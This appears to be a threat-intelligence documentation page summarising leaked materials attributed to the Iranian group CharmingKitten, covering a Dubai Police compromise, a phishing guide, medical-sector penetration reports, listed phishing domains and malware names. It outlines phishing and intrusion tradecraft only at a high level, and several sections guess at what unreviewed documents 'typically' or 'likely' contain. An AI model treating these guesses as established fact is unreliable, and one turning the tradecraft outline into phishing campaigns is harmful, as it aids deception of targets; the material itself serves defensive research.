Skip to main content

Additional Materials

Beyond the infrastructure documentation, Episode 4 includes several critical additional materials that provide insight into CharmingKitten’s operational methods, targets, and capabilities.

Overview

This episode contains three major categories of additional materials:
  1. Dubai Police materials - Documents obtained by the group from Dubai Police systems
  2. Phishing operations guide - Internal documentation on the group’s phishing techniques
  3. Penetration testing reports - Technical reports on compromised medical entities

Dubai Police Materials

Files Included

A1_AsImages.pdf - 1 page document
A2_AsImages.pdf - 12 page document These PDF files contain materials that CharmingKitten obtained from Dubai Police systems, representing a significant compromise of law enforcement infrastructure.

Significance

The presence of Dubai Police materials demonstrates:

Operational Targeting

  • Law enforcement compromise - CharmingKitten successfully penetrated Dubai Police systems
  • UAE operations - Active targeting of United Arab Emirates government entities
  • Intelligence collection - Gathering sensitive law enforcement information
  • Regional focus - Part of broader Middle East and Gulf region targeting

Intelligence Value

Dubai Police materials could provide:
  • Investigations intelligence - Information on ongoing police investigations
  • Personnel data - Details on law enforcement officers and officials
  • Operational procedures - Understanding of police capabilities and methods
  • Counter-intelligence - Identifying targets of police investigations related to Iran
  • Strategic planning - Intelligence for broader IRGC operations in the UAE

Attribution Context

This aligns with previously documented CharmingKitten targeting:
  • UAE government entities
  • Gulf Cooperation Council (GCC) countries
  • Law enforcement and intelligence organizations
  • Middle Eastern government infrastructure
The infrastructure sheets document operations targeting UAE including: AMEEN ALKHALIJ Server (mentioned in Episode 2)
  • Website established to recruit former UAE government and security employees
  • Server logs exposed in previous releases
  • Part of broader UAE targeting campaign

Operational Timeline

The Dubai Police compromise represents:
  • Long-term access - Materials suggest sustained compromise
  • Data exfiltration - Successfully extracted documents from internal systems
  • Storage in infrastructure - Files stored on CharmingKitten file servers
  • Documentation for reporting - Materials prepared for IRGC-IO leadership

Defensive Implications

For UAE and regional security organizations:
  1. Incident response - Dubai Police should conduct comprehensive forensic investigation
  2. Information assessment - Determine what data was compromised
  3. Personnel security - Protect individuals whose information may have been exposed
  4. Investigation impact - Assess if ongoing investigations were compromised
  5. Regional coordination - Share findings with other GCC countries

Phishing Operations Guide

Overview

The “Group’s Phishing Guide” is an internal document detailing CharmingKitten’s phishing techniques, procedures, and best practices. This represents operational doctrine for one of their primary attack vectors.

Key Components

While the complete guide requires detailed analysis, typical CharmingKitten phishing guides include:

Target Selection

  • Victim profiling - Methods for selecting high-value targets
  • Social media reconnaissance - Gathering intelligence from LinkedIn, Twitter, Facebook
  • Email address harvesting - Techniques for obtaining target email addresses
  • Organizational research - Understanding target organizations and hierarchies
  • Trust relationship mapping - Identifying relationships to exploit

Pretexting Techniques

  • Persona development - Creating convincing fake identities
  • Job recruitment lures - Using job opportunities as phishing themes (as seen in dreamy-jobs.com, israel-talent.com)
  • Conference invitations - Fake event and conference communications
  • Journalist impersonation - Posing as media for interview requests
  • Academic outreach - University and research collaboration lures
  • Government impersonation - Posing as official entities

Technical Methods

  • Credential harvesting - Fake login pages for email and social media
  • Malware delivery - Techniques for distributing BELLACIAO and other tools
  • Link shortening - Using URL shorteners to hide malicious domains
  • Email spoofing - Techniques for sender impersonation
  • Multi-stage attacks - Building trust before delivering payload

Infrastructure Usage

  • Domain selection - Choosing convincing domain names (as documented in infrastructure sheets)
  • SSL certificates - Obtaining legitimate certificates for credibility
  • Hosting selection - Using privacy-focused providers (TheOnionHost, Impreza, PRQ)
  • Email services - ProtonMail and other services for operational accounts
  • Backup infrastructure - Maintaining redundant phishing sites

Operational Security

  • Identity protection - Using procurement identities and fake personas
  • Payment anonymity - Bitcoin and other anonymous payment methods
  • Communication security - Using ISABELLE, 3CX, and SIGNAL
  • Access via TOR - Maintaining anonymity when accessing infrastructure
  • Compartmentalization - Limiting knowledge across team members

Documented Phishing Infrastructure

The infrastructure sheets show numerous phishing operations:

Job-Themed Phishing

  • dreamy-jobs.com - Generic job opportunities
  • wazayif-halima.org - Arabic job site (wazayif = jobs)
  • israel-talent.com / israel-talent.xyz - Israeli job recruitment
  • cavinet.org - Professional networking

Regional Targeting

  • bbmovements.com - Social movement themed
  • secnetdc.com - Technology/security themed
  • tecret.com - Technology themed

Influence Operations

  • moses-staff.io/to/se - Multi-platform influence campaign
  • abrahams-ax.se - Strategic operation
  • termite.nu - Alternative operation name

Evolution of Techniques

The phishing guide likely reflects years of operational experience:
  • Lessons learned - Adapted from successful and failed campaigns
  • Target responses - Understanding victim behavior and responses
  • Detection avoidance - Techniques to bypass security controls
  • Defensive measures - Countering security awareness training
  • Scale operations - Methods for running multiple simultaneous campaigns

Defensive Recommendations

Organizations should use this intelligence to:
  1. Update training - Educate employees on CharmingKitten’s specific techniques
  2. Email security - Implement controls for common phishing patterns
  3. URL filtering - Block known infrastructure and similar patterns
  4. Monitoring - Watch for reconnaissance and pretexting attempts
  5. Incident response - Prepare procedures for suspected CharmingKitten activity

Penetration Testing Reports

Medical Entity Target

File: طرح پیشنهادی - شرکت های فعال پزشکی مهندسی_AsImages.pdf (6 pages)
Translation: “Proposal - Active Medical Engineering Companies” This document appears to be a penetration testing report or proposal targeting medical organizations.

ESXi Infrastructure

File: Esxi 6.pdf (10 pages) This document focuses on VMware ESXi 6.x infrastructure, suggesting:

Target Focus

  • Virtualization infrastructure - Targeting ESXi hypervisors
  • Enterprise environments - Organizations using VMware for server virtualization
  • Privilege escalation - ESXi access provides control over all virtual machines
  • Persistence capabilities - Hypervisor-level access for long-term compromise

Technical Capabilities

ESXi targeting demonstrates:
  • Advanced technical skills - Understanding of virtualization infrastructure
  • Enterprise targeting - Focus on larger organizations
  • Lateral movement - ESXi as pivot point to other systems
  • Data access - Visibility into all VMs running on the hypervisor

Medical Sector Targeting

The medical entity reports reveal:

Strategic Focus

  • Healthcare targeting - Medical organizations as intelligence targets
  • Medical engineering - Specific interest in medical technology companies
  • Sensitive data - Patient records, medical research, proprietary technology
  • Iranian context - Possible focus on medical technology Iran seeks to acquire

Regional Implications

Medical targeting aligns with:
  • Technology transfer - Acquiring medical technology and research
  • Sanctions evasion - Understanding medical equipment for procurement
  • Industrial espionage - Stealing proprietary medical technology
  • Dual-use technology - Medical equipment with potential military applications

Report Structure

Typical penetration testing reports from CharmingKitten include:

Reconnaissance Phase

  • Target identification - Organization selection and justification
  • Infrastructure mapping - Networks, servers, and systems
  • Personnel identification - Key employees and access levels
  • Technology stack - Applications and security controls in use

Exploitation Phase

  • Initial access methods - Phishing, vulnerability exploitation
  • Privilege escalation - Techniques for gaining higher access
  • Lateral movement - Spreading through the network
  • Persistence mechanisms - Maintaining long-term access

Data Collection

  • Sensitive data identified - Types of valuable information found
  • Exfiltration methods - How data was stolen
  • File storage - Where stolen data was uploaded
  • Intelligence value - Assessment for IRGC-IO leadership

Recommendations Section

  • Further exploitation - Suggestions for deeper compromise
  • Additional targets - Related organizations to target
  • Tool improvements - Malware and technique enhancements
  • Operational security - Protecting the compromise from detection

Malware Integration

Penetration reports reference tools exposed in previous episodes:

BELLACIAO Malware (Episode 3)

  • .NET-based dropper with C# webshell
  • PowerShell reverse proxy using Plink
  • File upload/download capabilities
  • Command execution on compromised systems

CYCLOPS Malware

  • Additional tooling referenced in public reporting
  • Infrastructure overlap with documented servers
  • Multi-campaign usage across different targets

Python & Webshells Framework

  • Custom webshells for specific targets
  • Command management interface
  • Output relay systems for exfiltrated data

TAGHEB System

  • Windows-focused infection system
  • Access maintenance tooling
  • Integration with penetration operations

Anti-Virus Testing

Reports likely include testing against security products:
  • Microsoft Defender - Windows built-in protection
  • Kaspersky - Enterprise and consumer products
  • Avira - German antivirus solution
  • ESET - European security vendor
  • Other products - Comprehensive AV evasion testing

Intelligence Value

These additional materials provide:

Operational Understanding

  • Complete attack lifecycle - From phishing to penetration to reporting
  • Tool integration - How different malware and techniques are combined
  • Targeting priorities - Which sectors and organizations are of interest
  • Intelligence requirements - What data IRGC-IO leadership seeks

Attribution Evidence

  • Consistent infrastructure - Same servers used across all operations
  • Personnel continuity - Same individuals managing multiple campaigns
  • IRGC-IO connection - Reports prepared for Iranian intelligence leadership
  • Unit 1500 tasking - Counterintelligence division requirements

Defensive Intelligence

  • Phishing techniques - Specific methods to defend against
  • Infrastructure patterns - Predictable procurement and hosting choices
  • Technical capabilities - Understanding of their malware and tools
  • Target selection - Which organizations are at risk

Moses Staff Campaign

The infrastructure and techniques documented support the Moses Staff influence operation:
  • Destructive operations - Leaked data and defacement
  • Psychological operations - Threatening messaging and intimidation
  • Regional targeting - Focus on Israel and Middle East
  • Attribution deception - Attempting to hide Iranian connection

Multi-Country Targeting

Documented targets span multiple countries:
  • United Arab Emirates - Dubai Police compromise
  • Israel - Job phishing and talent recruitment
  • Turkey - Foreign Ministry attacks (Episode 3)
  • Saudi Arabia - Documented in Episode 2
  • Jordan, Kuwait, Qatar - Previous episode reporting
  • Iran - Regime opponents and dissidents

Analysis Recommendations

Security researchers should:
  1. Detailed document analysis - Extract IOCs and TTPs from all materials
  2. Cross-reference campaigns - Link these materials to known CharmingKitten operations
  3. Victim notification - Inform organizations that appear in penetration reports
  4. Tool comparison - Compare described techniques to observed malware behavior
  5. Timeline construction - Build comprehensive timeline of operations
  6. Share findings - Contribute analysis to threat intelligence community

Victim Support

Organizations that may have been targeted:

Immediate Actions

  1. Forensic investigation - Comprehensive analysis of systems and networks
  2. Credential reset - Change all passwords and access credentials
  3. Incident response - Engage IR team to hunt for compromise indicators
  4. Data assessment - Determine what information may have been accessed
  5. Legal notification - Comply with breach notification requirements

Long-Term Security

  1. Architecture review - Assess and improve security controls
  2. Monitoring enhancement - Implement detection for CharmingKitten TTPs
  3. Security training - Educate staff on this specific threat
  4. Threat intelligence - Subscribe to CharmingKitten-focused intelligence feeds
  5. Information sharing - Participate in sector-specific threat sharing
This exposure supports:

Sanctions Enforcement

  • Individual sanctions - Against exposed operatives
  • Entity sanctions - Against IRGC-IO and Unit 1500
  • Front company designations - JARF/ZHARF ANDISHAN TAFACOR SEFID

Diplomatic Actions

  • Formal protests - To Iranian government regarding cyber operations
  • International cooperation - Joint response with targeted countries
  • Attribution statements - Public attribution to IRGC-IO
  • Indictments - Criminal charges in affected countries
  • International warrants - Interpol red notices
  • Civil litigation - Lawsuits by affected organizations

Conclusion

The additional materials in Episode 4 complement the infrastructure exposure by providing:
  • Operational context - Understanding how infrastructure is used
  • Victim evidence - Proof of specific compromises and targets
  • Capability demonstration - Technical sophistication and methods
  • Intelligence value - IRGC-IO collection requirements and priorities
Together with the infrastructure sheets and personnel exposure, these materials provide the most comprehensive look yet at CharmingKitten’s operations under IRGC-IO control.

Next Episodes

Stay tuned for future episodes with additional exposures of:
  • More personnel identities
  • Additional operational materials
  • Further infrastructure details
  • Malware source code
  • Attack reports and victim data

Build docs developers (and LLMs) love

Get started for freeTalk to us